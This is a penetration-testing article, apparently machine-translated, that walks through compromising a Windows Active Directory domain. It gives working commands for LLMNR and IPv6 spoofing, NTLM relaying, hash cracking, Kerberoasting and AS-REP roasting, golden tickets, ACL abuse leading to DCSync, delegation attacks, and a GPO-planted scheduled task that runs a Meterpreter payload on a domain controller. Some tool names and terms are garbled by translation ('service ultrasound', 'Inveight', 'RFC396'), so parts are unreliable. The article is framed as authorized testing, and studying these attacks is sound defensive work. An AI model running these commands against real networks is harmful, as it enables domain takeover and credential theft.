Domain Attacks
When conducting penetration testing, we often identify errors in the domain configuration. Although this does not seem critical to many, in reality, such inaccuracies can cause the entire domain to be compromised.For example, according to the results of the pentest in one company, we came to the conclusion that all available machines in the domain were not lower than Windows10 / Windows Server2016, and they had all the latest patches on them. The network was regularly scanned, the machines were hard. All users sat through tokens and did not know their “20-character passwords.” Everything seems to be fine, but IPv6 has not been disabled. The domain capture scheme looked like this:
mitm6 -> ntlmrelay -> attack through delegation -> local administrator password hash is received -> domain administrator password hash is received.
Unfortunately, popular certifications such as OSCP, GPEN, or CEH do not teach Active Directory penetration testing.In this article, we will look at several types of Active Directory attacks that we carried out as part of pentests, as well as the tools used. This in no way can be considered a complete guide for all types of attacks and tools, there are really a lot of them, and it’s hard to fit into one article.So, for demonstration, we use a laptop on Kali Linux 2019 and the virtual hosts raised on it on VMware. Imagine that the main goal of the pentest is to obtain the rights of a domain administrator, and as input we have access to the company’s corporate network via ethernet. To start testing the domain, we need an account.
Getting an account
Consider the two most common, in my opinion, methods for obtaining the domain account login and password: LLMNR / NBNS spoofing and attack on IPv6 protocol.
LLMNR / NBNS Spoofing A
lot has been said about this attack. The bottom line is that the client sends out multicast LLMNR and broadcast NBT-NS queries to resolve host names if this was not possible via DNS. Such requests can be answered by any network user.
Tools that allow an attack:
- Response
- Inveight
- Metasploit modules: auxiliary / spoof / llmnr / llmnr_response, auxiliary / spoof / nbns / nbns_response,
auxiliary / server / capture / smb, auxiliary / server / capture / http_ntlm
With a successful attack, we can get the NetNTLM hash of the user’s password.
Responder -I eth0 -wrf |
The resulting hash, we can debug or execute NTLM-relays.
Attack on IPv6
If IPv6 is used on the corporate network, we can respond to DHCPv6 requests and set our IP address as the DNS server on the machine under attack . Since IPv6 takes precedence over IPv4, client DNS queries will be sent to our address. You can read more about the attack. here .
Instruments:
Running mitm6 utility
mitm6 -i vmnet0 |
After the attack is completed, a new DNS server with our IPv6 address will appear on the attacked workstation.
Attacked machines will try to authenticate with our machine. Raising the SMB server using the utility smbserver.py , we can get user password hashes.
smbserver.py -smb2support SMB / root / SMB |
Actions with captured hashes
The next step, we can either perform a cryptographic attack on the password hashes and get the password in clear text, or perform an NTLM relay.
Brute force
Everything is simple: take a hash of the password, hashcat
hashcat -m 5600 -a 3 hash.txt /usr/share/wordlists/rockyou.txt |
and brutus. The password can either be obtained or not 🙂
Harvey’s password has been restored – Pbvf2019
NTLM Relay
We can also execute NTLM-relays. After making sure that it is not used SMB Signing, use the utility ntlmrelayx.py and carry out the attack. Here again, depending on the goal, we select the vector we need. Let’s consider some of them.
Access to the attacked machine using the SMB protocol.
Perform an attack with key i .
ntlmrelayx.py -t 192.168.1.5 -l loot -i |
With a successful attack, we can connect to the remote machine using netcat.
Collection of domain information
In this case, we relay to the domain controller.
ntlmrelayx.py -t ldap: //192.168.1.2 |
If the attack is successful, we’ll get detailed information about the domain:
Adding a new computer to the domain
Each user by default has the ability to create up to 10 computers in the domain. To create a computer, you need to run a relay on a domain controller using the ldaps protocol. Creating users and computers over an unencrypted ldap connection is prohibited. Also, an account cannot be created if the connection via SMB is intercepted.
ntlmrelayx.py -t ldaps: //192.168.1.2 --add-computer |
As you can see in the figure, we were able to create a computer RORYOTGS $.
When creating more than 10 computers, we get an error of the following form:
Using the credentials of the RORYOTGS $ computer, we can perform legitimate requests to the domain controller.
Gathering Domain Information
So, we have a domain user or computer account. To continue testing, we need to collect available information for further attack planning. Consider some of the tools that will help us determine the search for the most critical systems, plan and execute an attack.
BloodHound
One of the most important tools that is used in almost all internal penetration testing. The project is actively developing and supplemented by new features.
They act as information collectors SharpHound.exe (requires installed .NET v3.5) and a script written in powershell SharpHound.ps1 . There is also a compiler written by a third-party developer in Python, – Bloodhound-python .
Used as a database Neo4j having its own syntax, which allows you to perform custom queries. You can familiarize yourself with the syntax in more detail. here .
The developers also provide a script. DBCreator.py , which allows you to generate a random base for testing.
Neo4j has a REST API. There are various utilities that can connect to the database and use the received data:
Let’s consider some of them.
Cypherdog
Cypherdog – BloodHound shell written in powershell. Includes 27 cmdlets.
By default, authentication is required to access the neo4j database. You can disable authentication by editing the neo4j.conf file. It needs to uncomment the line dbms.security.auth_enabled = false. But this is not recommended, as any user will be able to connect to the database at 127.0.0.1:7474 (the default configuration). You can read more about authentication and authorization in neo4j here.
Gofetch
Gofetch uses a graph created in bloodhound to plan and execute an attack.
Attack launch
. \ Invoke-GoFetch.ps1 -PathToGraph. \ PathFromBloodHound.json |
gt-generator
gt-generator Using data from BloodHound, simplifies the creation of golden tickets. To receive a golden ticket, only the username and password hash of the KRBTGT user are required.
python gt-generator.py -s 127.0.0.1 -u user -p pass administrator <KRBTGT_HASH> |
BloodHound Cypher queries for Active Directory Analysis
1- Find all unconstrained delegations excluding domain controllers MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH ‘-516’ WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2
2- Find constrained delegation
MATCH p=(u:User)-[:AllowedToDelegate]->(c:Computer) RETURN p
3-Find users that can be AS-REP roasted
MATCH (u:User {dontreqpreauth: true}) RETURN u
4- Find users with blank passwords that are enabled MATCH (u:User) WHERE NOT u.userpassword IS null AND u.enabled = TRUE RETURN u.name,u.userpassword
5- Find users having password in their description MATCH (m:User) WHERE m.description CONTAINS ‘password’ RETURN m.name, m.description
6- Find domain users with interesting permissions against GPOs MATCH p=(u:User)-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|GpLink*1..]->(g:GPO) RETURN p
7- Find groups that can reset passwords
MATCH p=(m:Group)-[r:ForceChangePassword]->(n:User) RETURN p
8- Find groups having local Admin privilege MATCH p=(m:Group)-[r:AdminTo]->(n:Computer) RETURN p
9- Find all users that have local admin rights MATCH p=(m:User)-[r:AdminTo]->(n:Computer) RETURN p
10- Find all active Domain Admin sessions MATCH (n:User)-[:MemberOf]->(g:Group) WHERE g.objectid ENDS WITH ‘-512’ MATCH p = (c:Computer)-[:HasSession]->(n) return p
11- Find all Certificates templates
MATCH (n:GPO) WHERE n.type = ‘Certificate Template’ RETURN n
12- Find enabled certificates templates MATCH (n:GPO) WHERE n.type = ‘Certificate Template’ and n.Enabled = true RETURN n
13- Find ESC1 Misconfigured Certificate Templates MATCH (n:GPO) WHERE n.type = ‘Certificate Template’ and n.`Enrollee Supplies Subject` = true and n.`Client Authentication` = true and n.`Enabled` = true RETURN n
14- Find ESC2 Misconfigured Certificate Template MATCH (n:GPO) WHERE n.type = ‘Certificate Template’ and n.`Enabled` = true and (n.`Extended Key Usage` = [] or ‘Any Purpose’ IN n.`Extended Key Usage`) RETURN n
15- Find Certificate Authorities with HTTP verb enrollment (ECS8) MATCH (n:GPO) WHERE n.type = ‘Enrollment Service’ and n.`Web Enrollment` = ‘Enabled’ RETURN n
Powerview
Powerview – Powershell framework included Powersploit . The following is a list of some cmdlets that will help you gather information about a domain.
Adidnsdump
When using integrated DNS in Active Directory, any domain user can query all the default DNS records.
Tool used: Adidnsdump.
Attacks on the domain
Now that we have information about the domain, we move on to the next phase of penetration testing – directly to the attack. Consider 4 potential vectors:
- Roasting
- Attack via ACL
- Kerberos delegation
- Abusing GPO Permissions
Roasting
This type of attack targets the Kerberos protocol. There are 2 types of attack like Roasting:
- Kerberoast
- Asreproast
Kerberoast
attack was first demonstrated by the user timmedin at DerbyCon in 2014 ( video ) If the attack is successful, we will be able to sort out the password of the service ultrasound in offline mode, without fear of blocking the user. Quite often, service accounts have excessive rights and an unlimited password, which may allow us to obtain domain administrator rights.
To understand the essence of the attack, consider how Kerberos works.
1. The password is converted to an NTLM hash, the timestamp is encrypted with a hash and sent to KDC as an authenticator in the TGT ticket request (AS-REQ). The domain controller (KDC) checks the user information and creates a TGT ticket.
2. The TGT ticket is encrypted, signed and sent to the user (AS-REP). Only the Kerberos service (KRBTGT) can open and read data from a TGT ticket.
3. A user submits a TGT ticket to a domain controller when requesting a TGS ticket (TGS-REQ). The domain controller opens a TGT ticket and checks the PAC checksum.
4. The TGS ticket is encrypted with the NTLM password hash of the service account and sent to the user (TGS-REP).
5. The user provides a TGS ticket to the computer on which the service is running (AP-REQ). The service opens a TGS ticket using its NTLM hash.
6. Access to the service is provided (AS-REP).
Having received a TGS-ticket (TGS-REP), we can find the password for the service account offline. For example, using hashcat.
According to RFC396 , 20 types of encryption are reserved for the Kerberos protocol. The types of encryption that are used now, in order of priority:
- AES256_CTS_HMAC_SHA1
- AES128_CTS_HMAC_SHA1
- RC4_HMAC_MD5
Recent versions of Windows use AES encryption by default. But for compatibility with systems below Windows Vista and Windows 2008 server, support for the RC4 algorithm is required. When conducting an attack, an attempt is always first made to obtain a TGS ticket with RC4_HMAC_MD5 encryption, which allows faster passwords to be sorted, and then with the rest. Harmj0y spent an interesting study and found that if you specify only Kerberos AES128 and AES256 encryption support in the user properties, the Kerberos ticket is still issued with RC4_HMAC_MD5 encryption.
Disable RC4_HMAC_MD5 necessary at the level domain.
Kerberoasting attack has 2 approaches.
1. The old method. TGS tickets are requested through setspn.exe or the .NET System.IdentityModel.Tokens.KerberosRequestorSecurityToken of the Powershell class, retrieved from memory using mimikatz, then converted to the desired format (John, Hashcat) and sorted.
2. The new method. machosec noticed that class KerberosRequestorSecurityToken has a method Getrequest , which extracts the encrypted part with a password from the TGS ticket.
Tools for conducting an attack:
1) Search for SPN records
- GetUserSPN.ps1
- Find-PSServiceAccounts.ps1
- Get-NetUSER -SPN
- (Get-ADUser -Filter {ServicePrincipalName -ne “$ null”} -Properties ServicePrincipalName) .ServicePrincipalName
2) Request a TGS ticket
- setspn.exe (native Windows utility)
- Ticket request through powershell
Add-Type -AssemblyNAme System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “<ServicePrincipalName>”
- Request-SPNTicket
You can view the current cached tickets using the klist command.
3) Export of tickets:
- Invoke-mimikatz -Command ‘”Kerberos :: list / export”‘
- Mimikatz -Command ‘”Kerberos :: list / export”‘
- Invioke-kerberoast
- tgsrepack.py
An example of automated execution of all 3 points:
- RiskiskSPN
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File kerberoasting.txt
- Powersploit
Invoke-Kerberoast -Domain jet.lab -OutputFormat Hashcat | fl
- GetUserSPNs.py
GetUserSPNs.py -request jet.lab \ user: Password
Asreproast
Vulnerability consists in disabled Kerberos pre-authentication settings. In this case, we can send AS-REQ requests to a user who has Kerberos pre-authentication disabled, and get the encrypted part with a password.
The vulnerability is rare, since disabling preauthentication is not the default setting.
Searching for Users with Kerberos Authentication Disabled:
- Powerview
Get-DomainUser -PreauthNotRequired -Properties samaccountname -Verbose
- Active Directory Module
get-aduser -filter * -properties DoesNotRequirePreAuth | where {$ _. DoesNotRequirePreAuth -eq "True" -and $ _. Enabled -eq "True"} | select Name
Getting the encrypted part:
- ASREPRoast
Invoke-ASREPROast | fl
An attack through an ACL
ACL in a domain context is a set of rules that determine the access rights of objects in AD. The ACL can be
triple for both a single object (for example, a user account), and for an organizational unit, for example, OU. When you configure the ACL on the OU, all objects within the OU will inherit the ACL. ACLs contain access control entries (ACEs) that determine how the SID interacts with the Active Directory object.
For example, we have three groups: A, B, C, where group C is a member of group B and group B is a member of group A. When you add guest to group C, guest will not only be a member of group C, but also an indirect member of groups B and A. When adding access to a domain object to group A, the guest user will also have access to this object. In a situation where the user is a direct member of only one group, and this group is an indirect member of the other 50 groups, it is easy to lose the connection of inherited permissions.
You can retrieve the ACLs associated with the object by running the following command
Get-ObjectACL -Samaccountname Guest -ResolveGUIDs |
You can use the tool to exploit errors in ACL configuration. Invoke-aclpwn . The Powershell script collects information about all ACLs in the domain using the BloodHound collector, SharpHound, and builds a chain to obtain writeDACL permission. After the chain is built, the script operates each step of the chain. The order of the script:
- The user is added to the necessary groups.
- Two ACEs (Replicating Directory Changes and Replicating Directory Changes ALL) are added to the ACLs of the domain object.
- If you have rights to DCSync using the Mimikatz utility, the password hash of the user krbtgt is requested (default setting).
- After the operation is completed, the script deletes all added groups and ACE entries in the ACL.
The script aims only to use writeDACL permissions. The following access rights may also be of interest to an attacker:
- ForceChangePassword. Rights to change the user password when the current password is not known. Operation with PowerSploit – Set-DomainUserPassword.
- AddMembers. Rights to add groups, computers, and users to groups. Operation with PowerSploit – Add-DomainGroupMember.
- GenericWrite Rights to change the attributes of an object. For example, change the value of the scriptPath parameter. The next time the user logs on to the system, the specified file starts. Operation with PowerSploit – Set-DomainObject.
- WriteOwner. Rights to change the owner of the object. Operation with PowerSploit – Set-DomainObjectOwner.
- AllExtendedRights. Rights to add users to groups, change user passwords, etc. Operation with PowerSploit – Set-DomainUserPassword or Add-DomainGroupMember.
Exploitation:
Starting from a machine that is in a domain
./Invoke-ACL.ps1 -SharpHoundLocation. \ Sharphound.exe -mimiKatzLocation. \ Mimikatz.exe |
Starting from a machine that is not in a domain
/Invoke-ACL.ps1 -SharpHoundLocation. \ Sharphound.exe -mimiKatzLocation. \ Mimikatz.exe -Username 'domain \ user' -Domain 'fqdn_of_target_domain' -Password 'Pass' |
- aclpwn.py Is a similar tool written in Python
Kerberos delegation Kerberos
delegation of authority allows you to reuse end-user credentials to access resources hosted on another server.
Kerberos delegation can be of three types:
- Unlimited (Unconstrained delegation). The only delegation option before Windows Server 2003
- Constrained delegation since Windows Server 2003
- Resource-Based Constrained Delegation Introduced in Windows Server 2012
Unlimited delegation
In the Active Directory snap-in, the included unlimited delegation function is as follows:
For clarity, consider how unlimited delegation occurs in the diagram.
- User password is converted to ntlm hash. The timestamp is encrypted with this hash and sent to the domain controller to request a TGT ticket.
- The domain controller checks the information about the user (restriction of login, membership in groups, etc.), creates a TGT ticket and sends it to the user. A TGT ticket is encrypted, signed, and only krbtgt can read its data.
- A user requests a TGS ticket to access a web service on a web server.
- The domain controller provides a TGS ticket.
- The user sends TGT and TGS tickets to the web server.
- The web server service account uses the user’s TGT ticket to request a TGS ticket to access the database server.
- The service account connects to the database server as a user.
The main danger of unlimited delegation is that when a machine with unlimited delegation is compromised, an attacker will be able to get TGT tickets of users from this machine and access to any system in the domain on behalf of these users.
Search for machines in a domain with unlimited delegation:
- Powerview
Get-NetComputer -unconstrained
- Active Directory Module
Get-Adcomputer -Filter {TrustedForDelegation -eq $ True}.
Ticket Export:
- Using mimikatz. sekurlsa :: tickets / export
- You can also perform a Pass-The-ticket attack.
kerberos :: ptt C: \ tickets \.
Limited delegation.
The limited delegation mode allows you to access only allowed services and on a specific machine. In the Active Directory snap-in, it looks like this:
With limited delegation, 2 Kerberos protocol extensions are used:
- S4uself
- S4UProxy
S4U2Self used when the client is not authenticated using the Kerberos protocol.
With unlimited delegation, TGT is used to identify the user, in which case the S4U extension uses the structure PA-FOR-USER as a new type in the “padata” / pre-authentication data field. The S4U2self process is only allowed if the requesting user has the TRUSTED_TO_AUTH_FOR_DELEGATION field set in his userAccountControl.
S4U2Proxy allows the service account to use the redirect ticket received in the S4U2proxy process to request a TGS ticket for access to allowed services (msds-allowtodelegateto). KDC checks if the requested service is specified in the msds-allowtodelegateto field of the requesting user, and issues a ticket if the check is successful. Thus, delegation is “limited” to specific target services.
You can search for computers and users in a limited delegation domain using Powerview .
Search for computers with unlimited delegation
Get-DomainComputer -TrustedtoAuth |
Search for limited delegation users
Get-DomainUser -TrustedtoAuth |
To conduct an attack, we need an open password, an NTLM password hash, or a TGT ticket.
Resource Based Limited Delegation
Like regular delegation, S4U extensions are used. Since resource-based delegation is primarily limited delegation, attacks that are relevant to regular limited delegation are also available here. The only difference is that in a simple limited delegation, service A must have an attribute msDS-AllowedToDelegateTo = ServiceB, and here service B should have an attribute msDS-AllowedToActOnBehalfOfOtherIdentity = Service A.
This property allows one more attack posted by harmj0y . An attack requires permissions to modify the PrincipalsAllowedToDelegateToAccount parameter, which sets the msds-AllowedToActOnBehalfOfOtherIdentity attribute, which contains an access control list (ACL). Unlike just limited delegation, we don’t need domain administrator rights to change the msds-AllowedToActOnBehalfOfOtherIdentity attribute. You can find out who has permission to edit the attribute as follows:
(Get-acl "AD: $ ((get-adcomputer Windows7) .distinguishedname)"). Access | Where-Object -Property ActiveDirectoryRights -Match WriteProperty | out-gridview |
So, to carry out the attack, execute mitm6
mitm6 -I vmnet0 |
We start ntlmrelayx with the option –delegate-access
ntlmrelayx -t ldaps: //dc1.jet.lab --delegate-access |
The attack creates a ZGXTPVYX $ computer with delegation rights to a Windows7 computer.
$ x = Get-ADComputer Windows7 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity $ x.'msDS-AllowedToActOnBehalfOfOtherIdentity'.Access |
A good delegation report was submitted on PHDays by Yegor Podmokov.
Abusing GPO Permissions
Group Policy Objects – A tool that allows administrators to effectively manage a domain. But it so happens that users are assigned unnecessary rights, including to change GPO policies.
To demonstrate the example, we will add the Ragnar user the rights to edit the Default Domain Controllers Policy (in real life, the rights for this policy are granted only to domain administrators, but the essence of the attack does not change; in the case of another policy, only the controlled hosts change).
Enumerate the rights to all GPOs in the domain using Powerview
Get-NetGPO | % {Get-ObjectAcl -ResolveGUIDs -Name $ _. Name} |
A Ragnar user has the right to change a GPO that has a GUID of 6AC1786C-016F-11D2-945F-00C04FB984F9. To determine which hosts in the domain apply this policy, run the following command
Get-NetOU -GUID "6AC1786C-016F-11D2-945F-00C04FB984F9" | % {Get-NetComputer -AdSpath $ _} |
Got the host dc1.jet.lab.
Knowing the specific policy that the Ragnar user can edit and the hosts to which this policy applies, we can perform various actions on the dc1.jet.lab host.
Instruments New-GPOImmediateTask and SharpGPOAbuse allow:
- Run task in task scheduler
- Add user rights (SeDebugPrivilege, SeTakeOwnershipPrivilege, etc.)
- Add a script that runs after startup
- Add user to local group
For example, add a task in the task scheduler to get a Meterpreter session:
New-GPOImmediateTask -TaskName test3 -GPODisplayName "Default Domain Controllers Policy" -CommandArguments '<powershell_meterepreter_payload>' -Force |
After execution, the scheduled test task
appears and the Meterpreter session appears.
To delete the scheduled task, you need to run the following command:
New-GPOImmediateTask -Remove -Force -GPODisplayName SecurePolicy |
Conclusions
In the article we examined only some attack vectors. Species like Enumerate Accounts and Password spray , MS14-068 , bunch Printer bug and Unconstrained Delegation, attacks on Exchange ( Ruler , Privexchange , ExchangeRelayX ) can significantly expand the scope of the attack.
Attack techniques and pinning methods (Golden ticket, Silver ticket, Pass-The-Hash, Over pass the hash, SID History, DC Shadow, etc.) are constantly changing, and the defense team should always be ready for new types of attacks.
Author: Puckiestyle